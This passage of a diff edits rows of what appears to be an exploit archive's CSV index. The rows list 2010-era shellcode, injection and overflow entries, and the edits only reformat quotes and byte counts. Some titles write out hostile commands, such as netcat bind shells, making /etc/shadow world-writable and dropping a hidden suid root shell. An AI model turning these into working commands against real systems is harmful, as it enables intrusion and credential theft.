bytes)",2010-04-14,Magnefikko,linux,shellcode,0 -13670,platforms/linux/shellcode/13670.c,"25 bytes execve(""/bin/sh"") shellcode",2010-04-14,Magnefikko,linux,shellcode,0 -13671,platforms/linux/shellcode/13671.c,"6 bytes DoS-Badger-Game shellcode",2010-04-14,Magnefikko,linux,shellcode,0 -13673,platforms/linux/shellcode/13673.c,"55 bytes SLoc-DoS shellcode by Magnefikko",2010-04-14,Magnefikko,linux,shellcode,0 -13675,platforms/lin_x86/shellcode/13675.c,"14 Bytes execve(""a->/bin/sh"") Local-only Shellcode",2010-04-17,Magnefikko,lin_x86,shellcode,0 -13676,platforms/lin_x86/shellcode/13676.c,"chmod(""/etc/shadow""_ 0777) Shellcode(33 Bytes)",2010-04-18,sm0k,lin_x86,shellcode,0 -13677,platforms/linux/shellcode/13677.c,"chmod(""/etc/shadow""_ 0777) shellcode (29 bytes)",2010-04-19,Magnefikko,linux,shellcode,0 +13661,platforms/linux/shellcode/13661.txt,"linux x86 - nc -lvve/bin/sh -p13377 shellcode",2010-04-02,anonymous,linux,shellcode,0 +13669,platforms/linux/shellcode/13669.c,"chmod(_/etc/shadow__ 0666) shellcode (36 bytes)",2010-04-14,Magnefikko,linux,shellcode,0 +13670,platforms/linux/shellcode/13670.c,"execve(_/bin/sh_) shellcode (25 bytes)",2010-04-14,Magnefikko,linux,shellcode,0 +13671,platforms/linux/shellcode/13671.c,"DoS-Badger-Game shellcode (6 bytes)",2010-04-14,Magnefikko,linux,shellcode,0 +13673,platforms/linux/shellcode/13673.c,"SLoc-DoS shellcode (55 bytes)",2010-04-14,Magnefikko,linux,shellcode,0 +13675,platforms/lin_x86/shellcode/13675.c,"execve(_a->/bin/sh_) Local-only Shellcode (14 Bytes)",2010-04-17,Magnefikko,lin_x86,shellcode,0 +13676,platforms/lin_x86/shellcode/13676.c,"chmod(_/etc/shadow__ 0777) Shellcode(33 Bytes)",2010-04-18,sm0k,lin_x86,shellcode,0 +13677,platforms/linux/shellcode/13677.c,"chmod(_/etc/shadow__ 0777) shellcode (29 bytes)",2010-04-19,Magnefikko,linux,shellcode,0 13679,platforms/linux/shellcode/13679.py,"Linux write() & exit(0) shellcode genearator with customizable text",2010-04-20,Stoke,linux,shellcode,0 13680,platforms/linux/shellcode/13680.c,"Linux x86 polymorphic forkbombe - 30 bytes",2010-04-21,"Jonathan Salwan",linux,shellcode,0 13681,platforms/linux/shellcode/13681.c,"Linux x86 forkbombe",2010-04-21,"Jonathan Salwan",linux,shellcode,0 -13682,platforms/lin_x86/shellcode/13682.c,"setreud(getuid()_ getuid()) & execve(""/bin/sh"") Shellcode (34 bytes)",2010-04-22,Magnefikko,lin_x86,shellcode,0 -13688,platforms/lin_x86-64/shellcode/13688.c,"Linux/x86_64 reboot(POWER_OFF) 19 bytes shellcode",2010-04-25,zbt,lin_x86-64,shellcode,0 -13691,platforms/linux/shellcode/13691.c,"Linux/x86_64 execve(""/bin/sh""); 30 bytes shellcode",2010-04-25,zbt,linux,shellcode,0 -13692,platforms/linux/shellcode/13692.c,"linux/x86 sends ""Phuck3d!"" to all terminals (60 bytes) shellcode",2010-04-25,condis,linux,shellcode,0 -13697,platforms/lin_x86/shellcode/13697.c,"Linux x86 - execve(""/bin/bash""_""-p""_NULL) (33 bytes)",2010-05-04,"Jonathan Salwan",lin_x86,shellcode,0 -13698,platforms/linux/shellcode/13698.c,"Linux x86 - polymorphic execve(""/bin/bash""_""-p""_NULL) (57 bytes)",2010-05-05,"Jonathan Salwan",linux,shellcode,0 +13682,platforms/lin_x86/shellcode/13682.c,"setreud(getuid()_ getuid()) & execve(_/bin/sh_) Shellcode (34 bytes)",2010-04-22,Magnefikko,lin_x86,shellcode,0 +13688,platforms/lin_x86-64/shellcode/13688.c,"Linux/x86_64 reboot(POWER_OFF) shellcode (19 bytes)",2010-04-25,zbt,lin_x86-64,shellcode,0 +13691,platforms/linux/shellcode/13691.c,"Linux/x86_64 execve(_/bin/sh_); shellcode (30 bytes)",2010-04-25,zbt,linux,shellcode,0 +13692,platforms/linux/shellcode/13692.c,"linux/x86 sends _Phuck3d!_ to all terminals (60 bytes) shellcode",2010-04-25,condis,linux,shellcode,0 +13697,platforms/lin_x86/shellcode/13697.c,"Linux x86 - execve(_/bin/bash___-p__NULL) (33 bytes)",2010-05-04,"Jonathan Salwan",lin_x86,shellcode,0 +13698,platforms/linux/shellcode/13698.c,"Linux x86 - polymorphic execve(_/bin/bash___-p__NULL) (57 bytes)",2010-05-05,"Jonathan Salwan",linux,shellcode,0 13699,platforms/win32/shellcode/13699.txt,"WinXP SP2 Fr Download and Exec Shellcode",2010-05-10,Crack_MaN,win32,shellcode,0 -13702,platforms/linux/shellcode/13702.c,"Linux x86 execve(""/usr/bin/wget""_ ""aaaa""); (42 bytes)",2010-05-17,"Jonathan Salwan",linux,shellcode,0 -13703,platforms/linux/shellcode/13703.txt,"linux/x86 sys_execve(""/bin/sh""_ ""0""_ ""0"") with umask 16 (sys_umask(14)) (45 bytes)",2010-05-31,gunslinger_,linux,shellcode,0 -13704,platforms/solaris_x86/shellcode/13704.c,"Solaris/x86 - execve(""/bin/sh""_""/bin/sh""_NULL) (27 bytes)",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode,0 +13702,platforms/linux/shellcode/13702.c,"Linux x86 execve(_/usr/bin/wget__ _aaaa_); (42 bytes)",2010-05-17,"Jonathan Salwan",linux,shellcode,0 +13703,platforms/linux/shellcode/13703.txt,"linux/x86 sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) (45 bytes)",2010-05-31,gunslinger_,linux,shellcode,0 +13704,platforms/solaris_x86/shellcode/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) (27 bytes)",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode,0 13707,platforms/solaris_x86/shellcode/13707.c,"Solaris/x86 - Halt shellcode - 36 bytes",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode,0 13709,platforms/solaris_x86/shellcode/13709.c,"Solaris/x86 - Reboot() - 37 bytes",2010-05-21,"Jonathan Salwan",solaris_x86,shellcode,0 13711,platforms/solaris_x86/shellcode/13711.c,"Solaris/x86 - Remote Download file - 79 bytes",2010-05-25,"Jonathan Salwan",solaris_x86,shellcode,0 13712,platforms/linux/shellcode/13712.c,"Linux/x86 - Disable randomize stack addresse - 106 bytes",2010-05-25,"Jonathan Salwan",linux,shellcode,0 -13715,platforms/linux/shellcode/13715.c,"Linux/x86 pwrite(""/etc/shadow""_ hash_ 32_ 8) Shellcode 83",2010-05-27,agix,linux,shellcode,0 +13715,platforms/linux/shellcode/13715.c,"Linux/x86 pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode 83",2010-05-27,agix,linux,shellcode,0 13716,platforms/linux/shellcode/13716.c,"Linux/x86 alphanumeric Bomb FORK Shellcode 117 Bytes",2010-05-27,agix,linux,shellcode,0 13719,platforms/win64/shellcode/13719.txt,"Windows 7 Pro SP1 64 Fr (Beep) Shellcode 39 Bytes",2010-05-28,agix,win64,shellcode,0 -13722,platforms/linux/shellcode/13722.c,"linux/x86 Shellcode Polymorphic - setuid(0) + chmod(""/etc/shadow""_ 0666) Shellcode (61 Bytes)",2010-05-31,antrhacks,linux,shellcode,0 -13723,platforms/linux/shellcode/13723.c,"change mode 0777 of ""/etc/shadow"" with sys_chmod syscall",2010-05-31,gunslinger_,linux,shellcode,0 +13722,platforms/linux/shellcode/13722.c,"linux/x86 Shellcode Polymorphic - setuid(0) + chmod(_/etc/shadow__ 0666) Shellcode (61 Bytes)",2010-05-31,antrhacks,linux,shellcode,0 +13723,platforms/linux/shellcode/13723.c,"change mode 0777 of _/etc/shadow_ with sys_chmod syscall",2010-05-31,gunslinger_,linux,shellcode,0 13724,platforms/linux/shellcode/13724.c,"kill all running process x86/linux",2010-05-31,gunslinger_,linux,shellcode,0 -13725,platforms/linux/shellcode/13725.txt,"change mode 0777 of ""/etc/passwd"" with sys_chmod syscall",2010-05-31,gunslinger_,linux,shellcode,0 -13726,platforms/linux/shellcode/13726.txt,"sys_execve(""/bin/sh""_ ""-c""_ ""reboot"") x86 linux shellcode (45 bytes)",2010-05-31,gunslinger_,linux,shellcode,0 -13728,platforms/linux/shellcode/13728.c,"39 bytes sys_setuid(0) & sys_setgid(0) & execve (""/bin/sh"") x86 linux shellcode",2010-06-01,gunslinger_,linux,shellcode,0 +13725,platforms/linux/shellcode/13725.txt,"change mode 0777 of _/etc/passwd_ with sys_chmod syscall",2010-05-31,gunslinger_,linux,shellcode,0 +13726,platforms/linux/shellcode/13726.txt,"sys_execve(_/bin/sh__ _-c__ _reboot_) x86 linux shellcode (45 bytes)",2010-05-31,gunslinger_,linux,shellcode,0 +13728,platforms/linux/shellcode/13728.c,"sys_setuid(0) & sys_setgid(0) & execve (_/bin/sh_) x86 linux shellcode (39 bytes)",2010-06-01,gunslinger_,linux,shellcode,0 13729,platforms/win64/shellcode/13729.txt,"Windows 7 x64 (cmd) Shellcode 61 Bytes",2010-06-01,agix,win64,shellcode,0 -13730,platforms/linux/shellcode/13730.c,"33 bytes unlink ""/etc/shadow"" x86 linux shellcode",2010-06-02,gunslinger_,linux,shellcode,0 +13730,platforms/linux/shellcode/13730.c,"unlink _/etc/shadow_ x86 linux shellcode (33 bytes)",2010-06-02,gunslinger_,linux,shellcode,0 13731,platforms/linux/shellcode/13731.c,"x86 linux hard / unclean reboot (29 bytes)",2010-06-03,gunslinger_,linux,shellcode,0 13732,platforms/linux/shellcode/13732.c,"x86 linux hard / unclean reboot (33 bytes)",2010-06-03,gunslinger_,linux,shellcode,0 13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command - 39 bytes",2010-06-03,"Jonathan Salwan",solaris,shellcode,0 @@ -12103,8 +12103,8 @@ id,file,description,date,author,platform,type,port 13739,platforms/php/webapps/13739.txt,"WmsCMS - XSS & SQL Injection Vulnerability",2010-06-06,Ariko-Security,php,webapps,0 13740,platforms/php/webapps/13740.txt,"iScripts eSwap 2.0 - SQLi and XSS Vulnerability",2010-06-06,Sid3^effects,php,webapps,0 13741,platforms/php/webapps/13741.txt,"iScripts easybiller 1.1 - SQL Injection Vulnerability",2010-06-06,Sid3^effects,php,webapps,0 -13742,platforms/linux/shellcode/13742.c,"48 bytes chown root:root /bin/sh x86 linux shellcode",2010-06-06,gunslinger_,linux,shellcode,0 -13743,platforms/linux/shellcode/13743.c,"45 bytes give all user root access when execute /bin/sh x86 linux shellcode",2010-06-06,gunslinger_,linux,shellcode,0 +13742,platforms/linux/shellcode/13742.c,"chown root:root /bin/sh x86 linux shellcode (48 bytes)",2010-06-06,gunslinger_,linux,shellcode,0 +13743,platforms/linux/shellcode/13743.c,"give all user root access when execute /bin/sh x86 linux shellcode (45 bytes)",2010-06-06,gunslinger_,linux,shellcode,0 15498,platforms/multiple/dos/15498.html,"Mozilla Firefox <= 3.6.12 - Remote Denial of Service",2010-11-12,"emgent white_sheep and scox",multiple,dos,0 15499,platforms/windows/local/15499.py,"Free WMA MP3 Converter 1.1 - Buffer Overflow Exploit (SEH)",2010-11-12,Dr_IDE,windows,local,0 13744,platforms/php/webapps/13744.txt,"RTRandomImage Remote File Inclusion Vulnerability",2010-06-06,"Sn!pEr.S!Te Hacker",php,webapps,0 @@ -12259,7 +12259,7 @@ id,file,description,date,author,platform,type,port 13910,platforms/lin_x86/shellcode/13910.c,"Polymorphic Bindport 31337 with setreuid (0_0) linux/x86",2010-06-17,gunslinger_,lin_x86,shellcode,0 13911,platforms/php/webapps/13911.txt,"Live CMS SQL Injection Vulnerability",2010-06-17,ahwak2000,php,webapps,0 13912,platforms/php/webapps/13912.txt,"Havij <= 1.10 - Persistent XSS",2010-06-17,hexon,php,webapps,0 -13915,platforms/lin_x86-64/shellcode/13915.txt,"Linux/x86-64 - setuid(0) & chmod (""/etc/passwd""_ 0777) & exit(0) (63 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 +13915,platforms/lin_x86-64/shellcode/13915.txt,"Linux/x86-64 - setuid(0) & chmod (_/etc/passwd__ 0777) & exit(0) (63 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 13916,platforms/php/webapps/13916.txt,"PHP-Nuke Module print 6.0 (print&sid) SQL Injection Vulnerability",2010-06-17,Gamoscu,php,webapps,0 13918,platforms/multiple/webapps/13918.txt,"Spring Framework arbitrary code execution",2010-06-18,"Meder Kydyraliev",multiple,webapps,0 13919,platforms/windows/dos/13919.c,"Corel VideoStudio Pro X3 - (.mp4) Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0 @@ -12352,13 +12352,13 @@ id,file,description,date,author,platform,type,port 14015,platforms/php/webapps/14015.txt,"2DayBiz photo sharing script SQL Injection Vulnerability",2010-06-24,JaMbA,php,webapps,0 14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta (init.php) Remote File Inclusion Vulnerability",2010-06-24,v3n0m,php,webapps,0 14017,platforms/php/webapps/14017.txt,"Joomla Component com_realtyna - LFI Vulnerability",2010-06-24,MISTERFRIBO,php,webapps,0 -14018,platforms/php/webapps/14018.txt,"2DayBiz Video Community portal""user-profile.php"" SQL Injection Vulnerability",2010-06-24,Sangteamtham,php,webapps,0 -14019,platforms/php/webapps/14019.txt,"2DayBiz Real Estate Portal ""viewpropertydetails.php"" SQL injection",2010-06-24,Sangteamtham,php,webapps,0 +14018,platforms/php/webapps/14018.txt,"2DayBiz Video Community portal - _user-profile.php_ SQL Injection Vulnerability",2010-06-24,Sangteamtham,php,webapps,0 +14019,platforms/php/webapps/14019.txt,"2DayBiz Real Estate Portal - _viewpropertydetails.php_ SQL injection",2010-06-24,Sangteamtham,php,webapps,0 14020,platforms/php/webapps/14020.txt,"2DayBiz - The Web Template Software SQL Injection and XSS Vulnerability",2010-06-24,Sangteamtham,php,webapps,0 14026,platforms/php/webapps/14026.txt,"AbleDating script SQL Injection Vulnerability",2010-06-24,JaMbA,php,webapps,0 14027,platforms/php/webapps/14027.txt,"ActiveCollab 2.3.0 - Local File Inclusion / Directory Traversal",2010-06-24,"Jose Carlos de Arriba",php,webapps,0 14028,platforms/php/webapps/14028.txt,"2daybiz B2B Portal Script SQL Injection Vulnerability",2010-06-24,JaMbA,php,webapps,0 -14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - ""Request"" Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0 +14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - _Request_ Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0 14030,platforms/asp/webapps/14030.pl,"phportal_1.2 (gunaysoft.php) Remote File Include Vulnerability",2010-06-24,Ma3sTr0-Dz,asp,webapps,0 14032,platforms/windows/dos/14032.pl,"Winstats (.fma) Local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0 14033,platforms/php/webapps/14033.txt,"Big Forum 5.2v Arbitrary File Upload & LFI Vulnerability",2010-06-24,"Zer0 Thunder",php,webapps,0 @@ -12404,7 +12404,7 @@ id,file,description,date,author,platform,type,port 14084,platforms/php/webapps/14084.txt,"Swoopo Clone 2010 SQL Injection Vunerability",2010-06-27,"L0rd CrusAd3r",php,webapps,0 14083,platforms/linux/dos/14083.pl,"Scite Text Editor 1.76 - Local Buffer Overflow (PoC)",2010-06-27,kmkz,linux,dos,0 14089,platforms/php/webapps/14089.txt,"PageDirector CMS - Multiple Vulnerabilities",2010-06-28,Tr0y-x,php,webapps,0 -14097,platforms/linux/shellcode/14097.c,"Linux/ARM - execve(""/bin/sh""_""/bin/sh""_0) (30 bytes)",2010-06-28,"Jonathan Salwan",linux,shellcode,0 +14097,platforms/linux/shellcode/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) (30 bytes)",2010-06-28,"Jonathan Salwan",linux,shellcode,0 14091,platforms/osx/remote/14091.py,"UFO: Alien Invasion 2.2.1 - Remote Code Execution (OSX)",2010-06-28,dookie,osx,remote,0 14094,platforms/php/webapps/14094.txt,"Netartmedia iBoutique.MALL SQLi Vulnerability",2010-06-28,Sid3^effects,php,webapps,0 14095,platforms/php/webapps/14095.txt,"I-net Multi User Email Script SQLi Vulnerability",2010-06-28,Sid3^effects,php,webapps,0 @@ -12428,9 +12428,9 @@ id,file,description,date,author,platform,type,port 14118,platforms/multiple/webapps/14118.txt,"LIOOSYS CMS (news.php) SQL Injection Vulnerability",2010-06-29,GlaDiaT0R,multiple,webapps,80 14119,platforms/lin_x86/shellcode/14119.c,"Polymorphic /bin/sh x86 linux shellcode",2010-06-29,gunslinger_,lin_x86,shellcode,0 14274,platforms/php/webapps/14274.txt,"Joomla Music Manager Component LFI Vulnerability",2010-07-08,Sid3^effects,php,webapps,0 -14142,platforms/linux/shellcode/14142.c,"Linux/ARM - polymorphic chmod(""/etc/shadow""_ 0777) (84 Bytes)",2010-06-30,"Florian Gaultier",linux,shellcode,0 +14142,platforms/linux/shellcode/14142.c,"Linux/ARM - polymorphic chmod(_/etc/shadow__ 0777) (84 Bytes)",2010-06-30,"Florian Gaultier",linux,shellcode,0 14121,platforms/multiple/dos/14121.c,"Adobe Reader 9.3.2 (CoolType.dll) Remote Memory Corruption / DoS Vulnerability",2010-06-29,LiquidWorm,multiple,dos,0 -14122,platforms/linux/shellcode/14122.txt,"Linux/ARM chmod(""/etc/shadow""_ 0777) Shellcode (35 Bytes)",2010-06-29,"Florian Gaultier",linux,shellcode,0 +14122,platforms/linux/shellcode/14122.txt,"Linux/ARM chmod(_/etc/shadow__ 0777) Shellcode (35 Bytes)",2010-06-29,"Florian Gaultier",linux,shellcode,0 14123,platforms/php/webapps/14123.txt,"WebDM CMS SQL Injection Vulnerability",2010-06-29,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 14124,platforms/php/webapps/14124.pl,"PHP-Nuke <= 8.0 - Remote SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 14125,platforms/php/webapps/14125.pl,"ShopCartDx <= 4.30 - (products.php) Blind SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 @@ -12478,7 +12478,7 @@ id,file,description,date,author,platform,type,port 14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting Add-On Remote File Inclusion Vulnerability",2010-07-03,lumut--,php,webapps,0 14187,platforms/php/webapps/14187.txt,"Joomla eventcal Component 1.6.4 com_eventcal Blind SQL Injection Vulnerability",2010-07-03,RoAd_KiLlEr,php,webapps,0 14188,platforms/php/webapps/14188.html,"Cpanel 11.25 - CSRF Add FTP Account Exploit",2010-07-03,G0D-F4Th3r,php,webapps,0 -14190,platforms/arm/shellcode/14190.c,"Linux/ARM - Polymorphic execve(""/bin/sh""_ [""/bin/sh""]_ NULL); - XOR 88 encoded (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0 +14190,platforms/arm/shellcode/14190.c,"Linux/ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL); - XOR 88 encoded (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0 14193,platforms/php/webapps/14193.c,"iscripts socialware 2.2.x - Multiple Vulnerabilities",2010-07-03,"Salvatore Fresta",php,webapps,0 14194,platforms/windows/remote/14194.cpp,"Sun Java Web Server 7.0 u7 - Remote Exploit",2010-07-03,dmc,windows,remote,0 14195,platforms/windows/remote/14195.html,"SasCam WebCam Server 2.6.5 - ActiveX SEH Overwrite",2010-07-03,blake,windows,remote,0 @@ -12501,10 +12501,10 @@ id,file,description,date,author,platform,type,port 14213,platforms/php/webapps/14213.txt,"Joomla Component Sef (com_sef) - LFI Vulnerability",2010-07-05,_mlk_,php,webapps,0 14214,platforms/php/webapps/14214.txt,"bbPress 1.0.2 - CSRF Change Admin Password",2010-07-05,saudi0hacker,php,webapps,0 14215,platforms/windows/local/14215.txt,"SasCam 2.7 - ActiveX Head Buffer Overflow",2010-07-05,blake,windows,local,0 -14216,platforms/linux/shellcode/14216.c,"97 bytes Linx x86 bind shell port 64533",2010-07-05,Magnefikko,linux,shellcode,0 +14216,platforms/linux/shellcode/14216.c,"Linx x86 bind shell port 64533 (97 bytes)",2010-07-05,Magnefikko,linux,shellcode,0 14217,platforms/php/webapps/14217.txt,"WikiWebHelp 0.28 - SQL Injection Vulnerability",2010-07-05,"ADEO Security",php,webapps,0 -14218,platforms/linux/shellcode/14218.c,"161 bytes Drop suid shell root in /tmp/.hiddenshell Linux Polymorphic Shellcode",2010-07-05,gunslinger_,linux,shellcode,0 -14219,platforms/linux/shellcode/14219.c,"setreuid(0_0) execve(""/bin/sh""_NULL_NULL) XOR Encoded Linux Shellcode (62 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 +14218,platforms/linux/shellcode/14218.c,"Drop suid shell root in /tmp/.hiddenshell Linux Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 +14219,platforms/linux/shellcode/14219.c,"setreuid(0_0) execve(_/bin/sh__NULL_NULL) XOR Encoded Linux Shellcode (62 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14250,platforms/php/webapps/14250.txt,"Joomla NeoRecruit (com_neorecruit Itemid) Blind SQL Injection Vulnerability",2010-07-06,Sid3^effects,php,webapps,0 14221,platforms/windows/shellcode/14221.html,"Safari JS JITed shellcode - exec calc (ASLR/DEP bypass)",2010-07-05,"Alexey Sintsov",windows,shellcode,0 14223,platforms/php/webapps/14223.txt,"Bs Scripts_Directory SQL Injection/Auth Bypass Vulnerability",2010-07-05,Sid3^effects,php,webapps,0 @@ -12520,7 +12520,7 @@ id,file,description,date,author,platform,type,port 14233,platforms/php/webapps/14233.txt,"Bs Auction Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0 14234,platforms/linux/shellcode/14234.c,"125 bind port to 6778 XOR encoded polymorphic linux shellcode .",2010-07-05,gunslinger_,linux,shellcode,0 14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 Admin Interface DoS",2010-07-06,muts,windows,dos,8800 -14235,platforms/linux/shellcode/14235.c,"91 bytes nc -lp 31337 -e /bin//sh polymorphic linux shellcode .",2010-07-05,gunslinger_,linux,shellcode,0 +14235,platforms/linux/shellcode/14235.c,"nc -lp 31337 -e /bin//sh polymorphic linux shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14237,platforms/php/webapps/14237.txt,"IBM Bladecenter Management - Multiple Web application vulnerabilities",2010-07-06,"Alexey Sintsov",php,webapps,0 14238,platforms/php/webapps/14238.txt,"BS Auction <= SQL Injection Vulnerability Exploit",2010-07-06,"Easy Laster",php,webapps,0 14239,platforms/php/webapps/14239.txt,"Auto Dealer <= SQL Injection Vulnerability Proof of Concept",2010-07-06,"Easy Laster",php,webapps,0 @@ -12540,13 +12540,13 @@ id,file,description,date,author,platform,type,port 14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Local Exploit Direct Ret ver.",2010-07-07,chap0,windows,local,0 14259,platforms/php/webapps/14259.txt,"SQL Injection Vulnerabilities Green Shop",2010-07-07,PrinceofHacking,php,webapps,0 14260,platforms/php/webapps/14260.txt,"Sijio Community Software SQL Injection/Persistent XSS Vulnerability",2010-07-07,Sid3^effects,php,webapps,0 -14261,platforms/arm/shellcode/14261.c,"ARM Polymorphic execve(""/bin/sh""_ [""/bin/sh""]_ NULL) Shellcode Generator",2010-07-07,"Jonathan Salwan",arm,shellcode,0 +14261,platforms/arm/shellcode/14261.c,"ARM Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode Generator",2010-07-07,"Jonathan Salwan",arm,shellcode,0 14262,platforms/php/webapps/14262.txt,"Simple Document Management System (SDMS) SQL Injection Vulnerability",2010-07-07,Sid3^effects,php,webapps,0 14264,platforms/hardware/webapps/14264.html,"Harris Stratex StarMAX 2100 WIMAX Subscriber Station Running Config CSRF Exploit",2010-07-07,kalyanakumar,hardware,webapps,0 14263,platforms/php/webapps/14263.txt,"artforms 2.1b7.2 rc2 joomla component Multiple Vulnerabilities",2010-07-07,"Salvatore Fresta",php,webapps,0 14265,platforms/php/webapps/14265.txt,"Joomla PaymentsPlus - Mtree 2.1.5 - Blind SQL Injection Vulnerability",2010-07-07,Sid3^effects,php,webapps,0 14267,platforms/windows/remote/14267.txt,"EA Battlefield 2 and Battlefield 2142 - Multiple Arbitrary File Upload Vulnerabilities",2010-07-08,"Luigi Auriemma",windows,remote,0 -14268,platforms/multiple/dos/14268.txt,"Qt 4.6.3 - ""QSslSocketBackendPrivate::transmit()"" Denial of Service",2010-07-08,"Luigi Auriemma",multiple,dos,0 +14268,platforms/multiple/dos/14268.txt,"Qt 4.6.3 - _QSslSocketBackendPrivate::transmit()_ Denial of Service",2010-07-08,"Luigi Auriemma",multiple,dos,0 14269,platforms/windows/remote/14269.html,"FathFTP 1.7 - ActiveX Buffer Overflow",2010-07-08,blake,windows,remote,0 14270,platforms/php/webapps/14270.txt,"Zylone IT Multiple Blind SQL Injection Vulnerability",2010-07-08,Callo,php,webapps,0 14271,platforms/php/webapps/14271.txt,"pithcms (theme) Local Remote File inclusion Vulnerability",2010-07-08,eidelweiss,php,webapps,0 @@ -12573,10 +12573,10 @@ id,file,description,date,author,platform,type,port 14296,platforms/php/webapps/14296.txt,"Joomla QuickFAQ Component (com_quickfaq) Blind SQL Injection Vulnerability",2010-07-09,RoAd_KiLlEr,php,webapps,0 14316,platforms/php/webapps/14316.pl,"PHP-Nuke <= 8.0 (Web_Links Module) Remote Blind SQL Injection Exploit",2010-07-10,yawn,php,webapps,0 14299,platforms/php/webapps/14299.txt,"CMS Contentia (news.php) SQL Injection Vulnerability",2010-07-09,GlaDiaT0R,php,webapps,0 -14305,platforms/linux/shellcode/14305.c,"Linux/x86-64 - execve(""/sbin/iptables""_ [""/sbin/iptables""_ ""-F""]_ NULL) (49 bytes)",2010-07-09,10n1z3d,linux,shellcode,0 +14305,platforms/linux/shellcode/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) (49 bytes)",2010-07-09,10n1z3d,linux,shellcode,0 14306,platforms/php/webapps/14306.txt,"HoloCMS 9.0.47 (news.php) SQL Injection Vulnerability",2010-07-09,GlaDiaT0R,php,webapps,0 14309,platforms/windows/remote/14309.html,"RSP MP3 Player OCX 3.2 - ActiveX Buffer Overflow",2010-07-09,blake,windows,remote,0 -14308,platforms/php/webapps/14308.txt,"Wordpress Firestats Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps,0 +14308,platforms/php/webapps/14308.txt,"Wordpress Firestats - Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps,0 15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS",2010-10-23,d0lc3,windows,dos,0 14310,platforms/php/webapps/14310.js,"DotDefender <= 3.8-5 No Authentication Remote Code Execution Through XSS",2010-07-09,rAWjAW,php,webapps,80 14313,platforms/php/webapps/14313.txt,"Joomla MyHome Component (com_myhome) Blind SQL Injection Vulnerability",2010-07-10,Sid3^effects,php,webapps,0 @@ -12657,7 +12657,7 @@ id,file,description,date,author,platform,type,port 14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server Remote Root Hash Disclosure Exploit",2010-07-18,kingcope,aix,remote,0 14410,platforms/php/webapps/14410.txt,"rapidCMS 2.0 - Authentication Bypass",2010-07-18,Mahjong,php,webapps,0 14412,platforms/windows/remote/14412.rb,"Hero DVD - Buffer Overflow Exploit (meta)",2010-07-19,Madjix,windows,remote,0 -14413,platforms/windows/dos/14413.txt,"Internet Explorer 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control",2010-07-20,"Beenu Arora",windows,dos,0 +14413,platforms/windows/dos/14413.txt,"Microsoft Internet Explorer 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control",2010-07-20,"Beenu Arora",windows,dos,0 14414,platforms/windows/dos/14414.txt,"Unreal Tournament 3 2.1 - 'STEAMBLOB' Command Remote Denial of Service Vulnerability",2010-07-20,"Luigi Auriemma",windows,dos,0 14415,platforms/php/webapps/14415.html,"EZ-Oscommerce 3.1 - Remote File Upload",2010-07-20,indoushka,php,webapps,0 14416,platforms/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption Exploit",2010-07-20,"Elazar Broad",windows,remote,0 @@ -12679,10 +12679,10 @@ id,file,description,date,author,platform,type,port 14438,platforms/php/webapps/14438.txt,"Free PHP photo gallery script Remote File inclusion Vulnerability",2010-07-22,"ViRuS Qalaa",php,webapps,0 14439,platforms/php/webapps/14439.txt,"phpBazar admin Information Disclosure Vulnerability",2010-07-22,Net_Spy,php,webapps,0 14440,platforms/php/webapps/14440.txt,"PHPBB MOD [2.0.19] Invitation Only (PassCode Bypass Vulnerability)",2010-07-22,Silic0n,php,webapps,0 -14441,platforms/php/webapps/14441.txt,"WordPress Plugin myLDlinker SQL Injection Vulnerability",2010-07-22,H-SK33PY,php,webapps,0 +14441,platforms/php/webapps/14441.txt,"WordPress Plugin myLDlinker - SQL Injection Vulnerability",2010-07-22,H-SK33PY,php,webapps,0 14442,platforms/php/webapps/14442.txt,"ZeeAdbox 2.x - SQL Injection Vulnerability",2010-07-23,SONIC,php,webapps,0 14443,platforms/php/webapps/14443.txt,"LILDBI Shell Upload Vulnerability",2010-07-23,EraGoN,php,webapps,0 -14444,platforms/php/webapps/14444.txt,"ZeeNetworking 1x- Arbitrary File Upload Vulnerability",2010-07-23,SONIC,php,webapps,0 +14444,platforms/php/webapps/14444.txt,"ZeeNetworking 1x - Arbitrary File Upload 